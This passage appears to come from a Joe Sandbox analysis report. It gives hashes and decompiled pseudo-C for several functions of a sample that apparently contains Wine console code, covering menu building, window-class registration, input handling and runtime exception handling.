                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemPaintProcSelectSolidStock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 88183673-0
                                                                                                                          • Opcode ID: 33b98cedd18625d55f0649404a87bd11025d118e538bc61b4d39dc6ded27fc14
                                                                                                                          • Instruction ID: 96be93f300e74fab8f29c1a4179cb04e4ac79cae997c6c1ea903e09a1e4d21b0
                                                                                                                          • Opcode Fuzzy Hash: 33b98cedd18625d55f0649404a87bd11025d118e538bc61b4d39dc6ded27fc14
                                                                                                                          • Instruction Fuzzy Hash: CED180B59043089FCB54EFA8E58969DBBF1BF48300F10892DE899EB350DB74A954CF46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024AE70 Relevance: 31.7, APIs: 21, Instructions: 226windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 49%
                                                                                                                          			E0024AE70(struct HMENU__* _a4, intOrPtr _a8) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HMENU__* _v16;
				short _v528;
				void* _v536;
				void* _v540;
				void* _v544;
				int _v548;
				int _v552;
				int _v556;
				int _v560;
				int _v564;
				int _v568;
				int _v572;
				WCHAR* _v576;
				int _v580;
				struct HINSTANCE__* _t129;
				int _t131;
				int _t135;
				int _t139;
				int _t143;
				int _t147;
				int _t151;
				int _t155;
				int _t159;
				int _t163;
				void* _t199;
				void* _t200;
				void* _t218;
				struct HINSTANCE__** _t225;
				struct HMENU__** _t226;

				_t129 = GetModuleHandleW(0);
				_t200 = _t199 - 4;
				_v12 = _t129;
				if(_a4 != 0) {
					_v16 = CreateMenu();
					if(_v16 != 0) {
						_t131 =  &_v528;
						_v548 = _t131;
						0xffe40000();
						LoadStringW(_v12, 0x110,  &_v528, _t131);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x110,  &_v528);
						_t135 =  &_v528;
						_v552 = _t135;
						0xffe40000();
						LoadStringW(_v12, 0x111,  &_v528, _t135);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x111,  &_v528);
						_t139 =  &_v528;
						_v556 = _t139;
						0xffe40000();
						LoadStringW(_v12, 0x112,  &_v528, _t139);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x112,  &_v528);
						_t143 =  &_v528;
						_v560 = _t143;
						0xffe40000();
						LoadStringW(_v12, 0x113,  &_v528, _t143);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x113,  &_v528);
						_t147 =  &_v528;
						_v564 = _t147;
						0xffe40000();
						LoadStringW(_v12, 0x114,  &_v528, _t147);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x114,  &_v528);
						_t151 =  &_v528;
						_v568 = _t151;
						0xffe40000();
						LoadStringW(_v12, 0x115,  &_v528, _t151);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x115,  &_v528);
						_t218 = _t200 - 0xffffffffffffff18;
						if(_a8 != 0) {
							InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
							_t218 = _t218 - 0x14;
						}
						_t155 =  &_v528;
						_v572 = _t155;
						0xffe40000();
						LoadStringW(_v12, 0x100,  &_v528, _t155);
						InsertMenuW(_a4, 0xffffffff, 0x410, _v16,  &_v528);
						_t159 =  &_v528;
						_v576 = _t159;
						0xffe40000();
						LoadStringW(_v12, 0x101,  &_v528, _t159);
						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v528);
						_t163 =  &_v528;
						_v580 = _t163;
						0xffe40000();
						_t225 = _t218 - 0xffffffffffffffb4;
						 *_t225 = _v12;
						_v580 = 0x102;
						_v576 =  &_v528;
						_v572 = _t163;
						LoadStringW(??, ??, ??, ??);
						_t226 = _t225 - 0x10;
						 *_t226 = _a4;
						_v580 = 0xffffffff;
						_v576 = 0x400;
						_v572 = 0x102;
						_v568 =  &_v528;
						InsertMenuW(??, ??, ??, ??, ??);
						_t200 = _t226 - 0x14;
						_v8 = 1;
					} else {
						_v8 = 0;
					}
				} else {
					_v8 = 0;
				}
				return _v8;
			}


































                                                                                                                          0x0024ae88
                                                                                                                          0x0024ae8e
                                                                                                                          0x0024ae91
                                                                                                                          0x0024ae98
                                                                                                                          0x0024aeb0
                                                                                                                          0x0024aeb7
                                                                                                                          0x0024aec9
                                                                                                                          0x0024aecf
                                                                                                                          0x0024aed2
                                                                                                                          0x0024aef6
                                                                                                                          0x0024af27
                                                                                                                          0x0024af30
                                                                                                                          0x0024af36
                                                                                                                          0x0024af39
                                                                                                                          0x0024af5d
                                                                                                                          0x0024af8e
                                                                                                                          0x0024af97
                                                                                                                          0x0024af9d
                                                                                                                          0x0024afa0
                                                                                                                          0x0024afc4
                                                                                                                          0x0024aff5
                                                                                                                          0x0024affe
                                                                                                                          0x0024b004
                                                                                                                          0x0024b007
                                                                                                                          0x0024b02b
                                                                                                                          0x0024b05c
                                                                                                                          0x0024b065
                                                                                                                          0x0024b06b
                                                                                                                          0x0024b06e
                                                                                                                          0x0024b092
                                                                                                                          0x0024b0c3
                                                                                                                          0x0024b0cc
                                                                                                                          0x0024b0d2
                                                                                                                          0x0024b0d5
                                                                                                                          0x0024b0f9
                                                                                                                          0x0024b12a
                                                                                                                          0x0024b130
                                                                                                                          0x0024b137
                                                                                                                          0x0024b165
                                                                                                                          0x0024b16b
                                                                                                                          0x0024b16b
                                                                                                                          0x0024b16e
                                                                                                                          0x0024b174
                                                                                                                          0x0024b177
                                                                                                                          0x0024b19b
                                                                                                                          0x0024b1cb
                                                                                                                          0x0024b1d4
                                                                                                                          0x0024b1da
                                                                                                                          0x0024b1dd
                                                                                                                          0x0024b201
                                                                                                                          0x0024b232
                                                                                                                          0x0024b23b
                                                                                                                          0x0024b241
                                                                                                                          0x0024b244
                                                                                                                          0x0024b249
                                                                                                                          0x0024b255
                                                                                                                          0x0024b258
                                                                                                                          0x0024b260
                                                                                                                          0x0024b264
                                                                                                                          0x0024b268
                                                                                                                          0x0024b26e
                                                                                                                          0x0024b27a
                                                                                                                          0x0024b27d
                                                                                                                          0x0024b285
                                                                                                                          0x0024b28d
                                                                                                                          0x0024b295
                                                                                                                          0x0024b299
                                                                                                                          0x0024b29f
                                                                                                                          0x0024b2a2
                                                                                                                          0x0024aebd
                                                                                                                          0x0024aebd
                                                                                                                          0x0024aebd
                                                                                                                          0x0024ae9e
                                                                                                                          0x0024ae9e
                                                                                                                          0x0024ae9e
                                                                                                                          0x0024b2b3

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateHandleMenuModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4123625242-0
                                                                                                                          • Opcode ID: e76df6756d4748bcb1291e4abd6e906f60f1ca3dd51fb45fef0e80fc1b0e3ef3
                                                                                                                          • Instruction ID: 98ea59470dc7239e20186ac7f65c812b4b31f06146f9d7dc51953cd6e83ceb82
                                                                                                                          • Opcode Fuzzy Hash: e76df6756d4748bcb1291e4abd6e906f60f1ca3dd51fb45fef0e80fc1b0e3ef3
                                                                                                                          • Instruction Fuzzy Hash: C6C1B5B48083059FD714EF68D58869EBBF0EB84324F10CB6DE8A997394D7749698CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024BD12 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 135COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongTextWindow$ColorObjectPaintSelect$BeginBrushCreateFillHandleItemLoadModuleParentRectSolidString
                                                                                                                          • String ID: ASCII: abcXYZ
                                                                                                                          • API String ID: 3404974346-732927841
                                                                                                                          • Opcode ID: 5756274c8393875f31a55e5b3254617e531221fe8301623069976c5a1e71da0d
                                                                                                                          • Instruction ID: 0e9b43773ccbcd97f4ea3fc2d8d53b7a2bbeab2d192e87f56fe3ab572ff71378
                                                                                                                          • Opcode Fuzzy Hash: 5756274c8393875f31a55e5b3254617e531221fe8301623069976c5a1e71da0d
                                                                                                                          • Instruction Fuzzy Hash: 5C6194B19083058FCB04EFA8E58865EBFF0BF48315F11892DE89997354E7749998DF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024A6C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 29%
                                                                                                                          			E0024A6C0(void* __edi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v12;
				char _v216;
				char _v428;
				struct _WNDCLASSW _v468;
				char _v980;
				struct HINSTANCE__* _v984;
				char* _v988;
				char* _v992;
				char* _v996;
				intOrPtr _v1000;
				void* _v1008;
				intOrPtr _v1012;
				struct HINSTANCE__* _v1016;
				intOrPtr _v1020;
				char* _v1024;
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t115;
				int _t117;
				intOrPtr* _t118;
				void* _t155;
				void* _t156;
				struct HINSTANCE__** _t165;
				struct HINSTANCE__** _t166;
				intOrPtr* _t167;
				intOrPtr* _t169;

				_t153 = __edi;
				L0025B10A();
				E0024FC70(__edi,  &_v428, 0, 0xd4);
				_v428 = _a4;
				if(_a8 == 0) {
					_v1016 = 0;
					_v1012 =  &_v428 + 4;
					E002433B0(_t153);
					_t156 = _t155 - 8;
				} else {
					_v1016 = _a4;
					_v1012 =  &_v428 + 4;
					E0024B9A0();
					_t156 = _t155 - 8;
				}
				E0024F6F0( &_v216,  &_v428 + 4, 0xcc);
				_v468.style = 0;
				_v468.lpfnWndProc = E0024BBF0;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConFontPreview";
				RegisterClassW( &_v468);
				_v468.style = 0;
				_v468.lpfnWndProc = E0024BF70;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConColorPreview";
				RegisterClassW( &_v468);
				_t110 =  &_v980;
				_v1024 = _t110;
				0xffe40000();
				_t165 = _t156 - 0xffffffffffffffdc;
				_v984 = _t110;
				_v988 =  &_v980;
				_t113 =  !=  ? 0x121 : 0x120;
				_v992 =  !=  ? 0x121 : 0x120;
				 *_t165 = 0;
				_t115 = GetModuleHandleW(??);
				_t166 = _t165 - 4;
				 *_t166 = _t115;
				_v1024 = _v992;
				_v1020 = _v988;
				_v1016 = _v984;
				_t117 = LoadStringW(??, ??, ??, ??);
				_t167 = _t166 - 0x10;
				if(_t117 == 0) {
					 *_t167 =  &_v980;
					_v1024 = L"Setup";
					E00251237();
				}
				_t118 = _t167;
				 *((intOrPtr*)(_t118 + 4)) =  &_v428 + 4;
				 *_t118 =  &_v216;
				 *((intOrPtr*)(_t118 + 8)) = 0xcc;
				if(E0024E06E() != 0) {
					if(_a8 != 0) {
						 *_t167 = _a4;
						_v1024 =  &_v428 + 4;
						E00244AF0();
						_t169 = _t167 - 8;
						 *_t169 = _v428;
						E00248EB0();
						_t167 = _t169 - 4;
					}
					_v996 =  &_v428 + 4;
					if(_a8 == 0) {
						_v1000 = 0;
					} else {
						_v1000 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
					}
					 *_t167 = _v1000;
					_v1024 = _v996;
					E0024C3F0();
					_v12 = 1;
				} else {
					_v12 = 1;
				}
				return _v12;
			}




























                                                                                                                          0x0024a6c0
                                                                                                                          0x0024a6d0
                                                                                                                          0x0024a6f0
                                                                                                                          0x0024a6f8
                                                                                                                          0x0024a702
                                                                                                                          0x0024a733
                                                                                                                          0x0024a73a
                                                                                                                          0x0024a73e
                                                                                                                          0x0024a743
                                                                                                                          0x0024a708
                                                                                                                          0x0024a714
                                                                                                                          0x0024a717
                                                                                                                          0x0024a71b
                                                                                                                          0x0024a720
                                                                                                                          0x0024a720
                                                                                                                          0x0024a764
                                                                                                                          0x0024a769
                                                                                                                          0x0024a779
                                                                                                                          0x0024a77f
                                                                                                                          0x0024a789
                                                                                                                          0x0024a7a5
                                                                                                                          0x0024a7ab
                                                                                                                          0x0024a7d0
                                                                                                                          0x0024a7e6
                                                                                                                          0x0024a7ec
                                                                                                                          0x0024a7fc
                                                                                                                          0x0024a80b
                                                                                                                          0x0024a814
                                                                                                                          0x0024a824
                                                                                                                          0x0024a82a
                                                                                                                          0x0024a834
                                                                                                                          0x0024a850
                                                                                                                          0x0024a856
                                                                                                                          0x0024a87b
                                                                                                                          0x0024a891
                                                                                                                          0x0024a897
                                                                                                                          0x0024a8a7
                                                                                                                          0x0024a8b6
                                                                                                                          0x0024a8bf
                                                                                                                          0x0024a8c5
                                                                                                                          0x0024a8c8
                                                                                                                          0x0024a8cd
                                                                                                                          0x0024a8d0
                                                                                                                          0x0024a8dc
                                                                                                                          0x0024a8f2
                                                                                                                          0x0024a8f5
                                                                                                                          0x0024a8fd
                                                                                                                          0x0024a904
                                                                                                                          0x0024a90a
                                                                                                                          0x0024a921
                                                                                                                          0x0024a924
                                                                                                                          0x0024a928
                                                                                                                          0x0024a92c
                                                                                                                          0x0024a930
                                                                                                                          0x0024a936
                                                                                                                          0x0024a93c
                                                                                                                          0x0024a94e
                                                                                                                          0x0024a951
                                                                                                                          0x0024a955
                                                                                                                          0x0024a955
                                                                                                                          0x0024a969
                                                                                                                          0x0024a96b
                                                                                                                          0x0024a96e
                                                                                                                          0x0024a970
                                                                                                                          0x0024a97f
                                                                                                                          0x0024a995
                                                                                                                          0x0024a9a7
                                                                                                                          0x0024a9aa
                                                                                                                          0x0024a9ae
                                                                                                                          0x0024a9b3
                                                                                                                          0x0024a9bc
                                                                                                                          0x0024a9bf
                                                                                                                          0x0024a9c4
                                                                                                                          0x0024a9c4
                                                                                                                          0x0024a9d0
                                                                                                                          0x0024a9da
                                                                                                                          0x0024a9f9
                                                                                                                          0x0024a9e0
                                                                                                                          0x0024a9ec
                                                                                                                          0x0024a9ec
                                                                                                                          0x0024aa10
                                                                                                                          0x0024aa13
                                                                                                                          0x0024aa17
                                                                                                                          0x0024aa1f
                                                                                                                          0x0024a985
                                                                                                                          0x0024a985
                                                                                                                          0x0024a985
                                                                                                                          0x0024aa31

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow
                                                                                                                          • String ID: Setup$WineConColorPreview$WineConFontPreview
                                                                                                                          • API String ID: 3977189380-2851978119
                                                                                                                          • Opcode ID: 60c334ce1855f0231097c1a3f7c7ff86978b657a34a658c19d5354b4b56da4b1
                                                                                                                          • Instruction ID: 05d8913daee9c2be6399a35389642dbee356c491d3efaa9b08d56dba33b3f223
                                                                                                                          • Opcode Fuzzy Hash: 60c334ce1855f0231097c1a3f7c7ff86978b657a34a658c19d5354b4b56da4b1
                                                                                                                          • Instruction Fuzzy Hash: D791CAB09152189FEB54EF68D94979DBBF4FB04304F0085AAE889E7350D7749A98CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00247B60 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 281COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateEventW.KERNEL32 ref: 00247BEE
                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 00247CBA
                                                                                                                          • MultiByteToWideChar.KERNEL32 ref: 00247D49
                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 00247DFD
                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 00247F9A
                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 00247FB6
                                                                                                                          • CloseHandle.KERNEL32 ref: 0024804E
                                                                                                                          • LeaveCriticalSection.KERNEL32 ref: 0024806D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Leave$Enter$ByteCharCloseCreateEventHandleMultiWide
                                                                                                                          • String ID: H$input restore failed: %#lx$input setup failed: %#lx
                                                                                                                          • API String ID: 628538822-1542851097
                                                                                                                          • Opcode ID: 5a86b157bc9bea5bf325772672a38d2ef45151c42e57eede771e99cdfa9815ef
                                                                                                                          • Instruction ID: 34207fb786d82ff33addd3c4a01da3355e5a3f0de51fda258ab0c40fe1213c82
                                                                                                                          • Opcode Fuzzy Hash: 5a86b157bc9bea5bf325772672a38d2ef45151c42e57eede771e99cdfa9815ef
                                                                                                                          • Instruction Fuzzy Hash: 20D15DB0819215CFD715EF68D8987AEBBF4BF44310F0089ADE4A997380D7749A98CF52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00242420 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Info$CharsetStartupTranslate
                                                                                                                          • String ID: WineConsoleClass
                                                                                                                          • API String ID: 3822699805-3427835368
                                                                                                                          • Opcode ID: abfc5bce13491f54c51f4887d1a6902aa60e2299e6b1e3226b991f9be35418a5
                                                                                                                          • Instruction ID: 376bcdb107623f883d10465a3bb55bde2937d3c8a9c65e56f901913b788f41dc
                                                                                                                          • Opcode Fuzzy Hash: abfc5bce13491f54c51f4887d1a6902aa60e2299e6b1e3226b991f9be35418a5
                                                                                                                          • Instruction Fuzzy Hash: B591C5B4914219CFDB14DF68D998B9DBBF0FB48304F0085A9E889AB350D7759A98CF41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00242E60 Relevance: 16.7, APIs: 11, Instructions: 228COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2170087643-0
                                                                                                                          • Opcode ID: f8574d4e4641ee49c8c263bb6619dc0f7e566dab1a0defe6e32649e09c14a049
                                                                                                                          • Instruction ID: a68137ee94c1987f88ed34074324359c8eb986ce243b4e73851f5d03cf79df88
                                                                                                                          • Opcode Fuzzy Hash: f8574d4e4641ee49c8c263bb6619dc0f7e566dab1a0defe6e32649e09c14a049
                                                                                                                          • Instruction Fuzzy Hash: EBB18174A14209DFCB14DF68D588A99BBF1FF48310F45C4A9E899DB361DB30E998CB41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00257AC2 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 303COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 63%
                                                                                                                          			E00257AC2(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				char _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t152;
				void* _t155;
				signed char _t160;
				signed int _t161;
				void* _t163;
				void* _t166;
				void* _t169;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t191;
				void* _t196;
				void* _t197;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t210;
				signed int _t211;
				intOrPtr _t214;
				signed int* _t218;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t234;
				void* _t235;

				_t216 = __edx;
				_t218 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t204 = E00258C98(_a8, _a16, _t218);
				_t235 = _t234 + 0xc;
				_v12 = _t204;
				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
					L67:
					E00251C1C(_t202, _t204, _t216, _t225);
					asm("int3");
					__eflags = _v88;
					_push(_t202);
					_t203 = _v92;
					_push(_t225);
					_push(_t218);
					_t219 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t203);
						_push(_t219);
						_push(_v0);
						E00257A29(_t203, _t219, _t225, __eflags);
						_t235 = _t235 + 0x10;
					}
					_t146 = _a36;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = _t219;
					}
					E0025429E(_t204, _t146, _v0);
					_t226 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t219);
					E00257272(_t203, _t204, _t216, _t219, _a28, __eflags);
					E00258CB5(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t203 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t219);
					_push(_v0);
					_t152 = E00257469(_t203, _t216, _t219, _t226, __eflags);
					__eflags = _t152;
					if(_t152 != 0) {
						E0025426E(_t152, _t219);
						return _t152;
					}
					return _t152;
				} else {
					_t202 = _a4;
					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
						L22:
						_t216 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t225 = 0;
						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t155 = E00251CAE(_t202, _t204, _t216, 0);
							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
								L61:
								return _t155;
							} else {
								_t202 =  *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, 0) + 0x10));
								_t191 = E00251CAE(_t202, _t204, _t216, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t191 + 0x14));
								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00251CAE(_t202, _t204, _t216, _t225) + 0x1c)) == _t225) {
										L23:
										_t216 = _v8;
										_t204 = _v12;
										L24:
										_v52 = _t218;
										_v48 = 0;
										__eflags =  *_t202 - 0xe06d7363;
										if( *_t202 != 0xe06d7363) {
											L57:
											__eflags = _t218[3];
											if(_t218[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													E00257EE7(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
													_t235 = _t235 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
												goto L57;
											} else {
												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
													L29:
													_t225 = _a32;
													__eflags = _t218[3];
													if(_t218[3] > 0) {
														E002541FE(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
														_t216 = _v64;
														_t235 = _t235 + 0x18;
														_t179 = _v68;
														_v44 = _t179;
														_v16 = _t216;
														__eflags = _t216 - _v56;
														if(_t216 < _v56) {
															_t210 = _t216 * 0x14;
															__eflags = _t210;
															_v32 = _t210;
															do {
																_t57 =  &_v104; // 0x257852
																_t211 = 5;
																_t182 = memcpy(_t57,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
																_t235 = _t235 + 0xc;
																__eflags = _v104 - _t182;
																if(_v104 <= _t182) {
																	__eflags = _t182 - _v100;
																	if(_t182 <= _v100) {
																		_t214 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
